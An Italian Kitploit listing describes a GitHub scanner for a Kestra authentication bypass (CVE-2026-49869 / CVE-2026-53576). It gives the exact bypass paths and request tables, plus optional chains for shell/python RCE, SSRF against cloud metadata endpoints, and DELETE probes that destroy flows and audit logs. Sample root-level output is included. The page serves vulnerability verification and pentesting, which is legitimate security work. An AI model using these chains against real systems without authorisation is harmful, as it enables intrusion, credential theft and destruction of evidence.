Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-49869 — Kestra Verificatore di Vulnerabilità di Bypass dell'Autenticazione | Kitploit
Strumenti/GitHubGitHub/ap0dexme0/cve-2026-49869
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlAutenticazione
GitHubap0dexme0/cve-2026-49869

CVE-2026-49869

Kestra Verificatore di Vulnerabilità di Bypass dell'Autenticazione

Vedi Repository
1153 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Kestra CVE-2026-49869 / CVE-2026-53576 Scanner

Esegue la scansione delle istanze Kestra per il bypass del filtro di autenticazione endsWith("/configs"). Il file AuthenticationFilter.java di Kestra controlla request.getPath().endsWith("/configs") invece di confrontare il percorso esatto /api/v1/configs. Poiché Kestra indirizza le risorse tramite segmenti di percorso scelti dal chiamante (namespace, flow ID), qualsiasi percorso che termina con /configs bypassa l'autenticazione Basic-Auth, consentendo la creazione non autenticata di flow e RCE. (CVSS 10.0)

Riferimenti:

  • GHSA-5vc5-wxxq-3fjx
  • TP-2026-009
  • CVE-2026-49869 Autenticazione Impropria / OS Command Injection / Lista Incompleta di Input Non Consentiti
  • CVE-2026-53576

Logica di Rilevamento

  1. Verifica di attività + versione GET /api/v1/configs (deve restituire 200; il corpo della risposta viene analizzato per ottenere la versione di Kestra)
  2. Controllo autenticazione GET /api/v1/{tenant}/flows (dovrebbe restituire 401/403 se l'autenticazione è applicata)
  3. Sondaggi di bypass 6 richieste GET a percorsi che terminano con /configs; se qualcuno restituisce un codice diverso da 401/403 mentre il controllo di autenticazione è applicato, l'istanza è vulnerabile
  4. Modalità aggressiva (--aggressive) invia anche richieste PUT per confermare la capacità di bypass in scrittura
  5. Verifica RCE (--rce) catena completa: crea flow shell/python → attiva esecuzione → recupera log → conferma esecuzione codice → pulizia
  6. Rilevamento SSRF (--ssrf) crea un flow con http() di Pebble che ha come target i metadata cloud AWS/GCP/Azure e gli endpoint interni, quindi controlla i log per evidenze
  7. Sondaggi DELETE (--destructive) invia DELETE a percorsi di bypass di flow, dashboard e log per confermare il bypass di operazioni distruttive

Endpoint dei Sondaggi

Sondaggi Sicuri (predefiniti)

ProbeMethodPathDescrizione
Public ConfigsGET/api/v1/configsVerifica di attività + estrazione versione
Protected NormalGET/api/v1/{tenant}/flowsBaseline di applicazione autenticazione
Flows BypassGET/api/v1/{tenant}/flows/{namespace}/configsBypass elenco flow
Executions BypassGET/api/v1/{tenant}/executions/{namespace}/configsBypass esecuzioni
KV Store BypassGET/api/v1/{tenant}/namespaces/{namespace}/kv/configsBypass lettura KV
Dashboards BypassGET/api/v1/{tenant}/dashboards/configsBypass dashboard
Logs BypassGET/api/v1/{tenant}/logs/{namespace}/configsBypass accesso log
Templates BypassGET/api/v1/{tenant}/templates/{namespace}/configsBypass lettura template

Sondaggi Aggressivi (--aggressive)

ProbeMethodPathDescrizione
Flows PUT BypassPUTstesso di Flows BypassCrea un flow debug.Return minimale
KV PUT BypassPUTstesso di KV BypassCrea una voce KV {"scanned": true}

Sondaggi Distruttivi (--destructive)

ProbeMethodPathDescrizione
Flows DELETE BypassDELETEstesso di Flows BypassElimina una risorsa denominata "configs"
Dashboards DELETE BypassDELETEstesso di Dashboards BypassElimina una dashboard denominata "configs"
Logs DELETE BypassDELETEstesso di Logs BypassDistrugge i log di audit

Catena di Verifica RCE (--rce)

Viene eseguita solo quando il bypass di autenticazione è confermato. La catena completa dall'avviso:

StepMethodPathDescrizione
1. Crea flow RCEPUT/api/v1/{tenant}/flows/{namespace}/configsDistribuisce flow con io.kestra.plugin.scripts.shell.Commands (echo <marker>, id, hostname). Ripiega su io.kestra.plugin.scripts.python.Script in caso di fallimento.
2. Attiva esecuzionePOST/api/v1/{tenant}/executions/{namespace}/configsAvvia il flow tramite il percorso di bypass
3. Recupera logGET/api/v1/{tenant}/logs/search?executionId=<id>Esegue polling fino a --poll-retries volte (default 10) ogni --poll-interval secondi (default 3) cercando il marker RCE univoco
4. PuliziaDELETEstesso dello step 1Rimuove il flow distribuito

Catena di Rilevamento SSRF (--ssrf)

Viene eseguita solo quando il bypass di autenticazione è confermato:

StepMethodPathDescrizione
1. Crea flow SSRFPUT/api/v1/{tenant}/flows/{namespace}/configsDistribuisce un task debug.Return con chiamate Pebble http() verso AWS (169.254.169.254/latest/meta-data/ami-id), GCP (metadata.google.internal), Azure (169.254.169.254/metadata/instance) e interno (127.0.0.1:8080/api/v1/configs)
2. Attiva esecuzionePOSTstesso dello step 2 RCEAttiva il flow
3. Recupera logGET/api/v1/{tenant}/logs/search?executionId=<id>Controlla la presenza di indicatori di metadata cloud (ami-, i-, 169.254.169.254, metadata.google.internal, ecc.)
4. PuliziaDELETEstesso dello step 1Rimuove il flow distribuito

Riferimento CLI

positional:
  target                          URL target singolo (es. http://localhost:8080)

options:
  -f, --file                      File con target (uno per riga)
  -t, --timeout                   Timeout richiesta in secondi (default: 10)
  --verify-ssl                    Verifica certificati TLS
  -j, --json                      Output JSON su stdout
  -o, --output                    Scrivi report JSON su file
  --tenant                        Nome tenant (default: "main")
  --namespace                     Namespace per percorsi di bypass (default: "tutorial")
  -w, --workers                   Numero di thread per scansioni bulk (default: 10)
  -a, --aggressive                Invia richieste PUT per confermare bypass scrittura
  -P, --auto-ports                Porte per auto-espansione (default: 8080 8081 8088 8091 80 443)

advanced probes:
  -r, --rce                       Abilita catena di verifica RCE (flow shell + python,
                                   attivazione esecuzione, recupero log, pulizia automatica)
  -s, --ssrf                      Abilita rilevamento SSRF (Pebble http() verso endpoint
                                   metadata cloud, raccolta evidenze basate su log)
  -d, --destructive               Abilita sondaggi DELETE su flow, dashboard e log
                                   (ELIMINERÀ risorse su istanze vulnerabili)
  --poll-interval                 Secondi tra i polling dei log per catene RCE/SSRF (default: 3)
  --poll-retries                  Numero massimo di tentativi di polling log per catene RCE/SSRF (default: 10)

Output

Target Singolo

Ripartizione completa per singolo sondaggio con arricchimento (versione, stato RCE, SSRF, DELETE) e verdetto:

====================================================================
  Target:    http://10.0.0.1:8080
  Timestamp: 2026-06-30T12:00:00+00:00
====================================================================

  Versione:      1.3.20 (AFFETTA)
  RCE:          CONFERMATO tramite shell
    | SCAN_RCE_a1b2c3d4e5f6
    | uid=0(root) gid=0(root) groups=0(root)
  SSRF:         RILEVATO
    | Indicatori trovati: ami-, 169.254.169.254, 127.0.0.1:8080
  DELETE BYPASS: CONFERMATO ops distruttive bypassano autenticazione

  [Flows Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/flows/tutorial/configs
    Stato:       200
    Bypass:      SÌ

  [Exec Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/executions/tutorial/configs
    Stato:       404
    Bypass:      No

  ...
Scarica lo strumento